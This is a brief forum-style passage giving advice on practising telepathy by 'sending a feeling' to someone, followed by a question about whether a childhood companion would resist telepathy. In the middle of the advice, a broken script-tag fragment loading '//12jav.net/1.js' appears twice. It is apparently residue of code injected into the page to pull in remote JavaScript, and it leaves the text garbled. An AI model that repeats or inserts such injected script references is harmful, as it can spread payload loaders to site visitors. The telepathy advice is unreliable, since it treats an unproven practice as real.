It's about what feels right for you. A good place to start is practicing sending a feeling to someone, build up from there. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

If you've known the person since you were four, and never left their side since, would they either have a special bond with you, be resistant to your telepathy or none of the above?
